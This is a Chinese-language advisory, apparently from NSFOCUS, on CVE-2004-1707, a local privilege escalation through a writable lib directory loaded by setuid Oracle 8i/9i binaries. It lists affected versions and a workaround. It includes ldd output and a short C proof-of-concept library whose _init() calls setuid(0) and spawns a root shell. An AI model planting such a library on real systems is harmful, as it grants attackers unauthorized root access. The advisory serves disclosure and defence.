安全研究
安全漏洞
多个Oralce产品本地权限提升漏洞
发布日期:2004-08-02
更新日期:2004-08-03
受影响系统:
Oracle Oracle8i Standard Edition 9.2 .0.2描述:
Oracle Oracle8i Standard Edition 9.2 .0.1
Oracle Oracle8i Standard Edition 9.0.2
Oracle Oracle8i Standard Edition 9.0.1 .4
Oracle Oracle8i Standard Edition 9.0.1 .3
Oracle Oracle8i Standard Edition 9.0.1 .2
Oracle Oracle8i Standard Edition 9.0.1
Oracle Oracle8i Standard Edition 9.0
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Personal Edition 9.2 .0.2
Oracle Oracle8i Personal Edition 9.2 .0.1
Oracle Oracle8i Personal Edition 9.0.1
Oracle Oracle8i Enterprise Edition 9.2 .0.2
Oracle Oracle8i Enterprise Edition 9.2 .0.1
Oracle Oracle8i Enterprise Edition 9.0.1
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Client Edition 9.2 .0.2
Oracle Oracle8i Client Edition 9.2 .0.1
Oracle Oracle8i 9.0.1
Oracle Oracle8i 9.0
Oracle Oracle8i 8.1.7.1
Oracle Oracle8i 8.1.7
Oracle Oracle8i 8.1.6
Oracle Oracle8i 8.1.5
Oracle Oracle8i 8.0.6
Oracle Oracle8i 8.0.5
Oracle Oracle8i 8.0.4
Oracle Oracle8i 8.0.2
Oracle Oracle8i 8.0.1
Oracle Oracle9i Standard Edition 9.2.0.4
Oracle Oracle9i Standard Edition 9.2.0.1
Oracle Oracle9i Release 2 9.2.2
Oracle Oracle9i Release 2 9.2.1
Oracle Oracle9i Personal Edition 9.2.0.4
Oracle Oracle9i Personal Edition 9.2.0.1
Oracle Oracle9i Enterprise Edition 9.2.0.4
Oracle Oracle9i Enterprise Edition 9.2.0.1
Oracle Oracle9i 9.2.0.3
Oracle Oracle9i 9.2.0.2
Oracle Oracle9i 9.2.0.1
Oracle Oracle9i 9.2
Oracle Oracle9i 9.0.2
Oracle Oracle9i 9.0.1.4
Oracle Oracle9i 9.0.1.3
Oracle Oracle9i 9.0.1.2
Oracle Oracle9i 9.0.1
Oracle Oracle9i 9.0
CVE(CAN) ID: CVE-2004-1707
Oracle是一种强大的企业级数据库系统。
Oracle不正确对lib库目录进行限制,本地攻击者可以利用这个漏洞进行权限提升攻击。
部分setuid属性的应用程序如'/bin/dbsnmp'、'/bin/nmo'以如下方法调用共享库,如:
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....
但是lib目录却为iasr2用户可写:
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
因此iasr2用户可以简单地创建文件,如so.lib:
#include
#include
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
当执行受此漏洞影响的程序时,可导致恶意库被装载而执行任意命令。
<*来源:Juan Manuel Pascual (jmpascual@open3s.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109147677214087&w=2
*>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 把lib库设置为只有root可写。
厂商补丁:
Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.oracle.com
浏览次数:2715
严重程度:0(网友投票)
绿盟科技给您安全的保障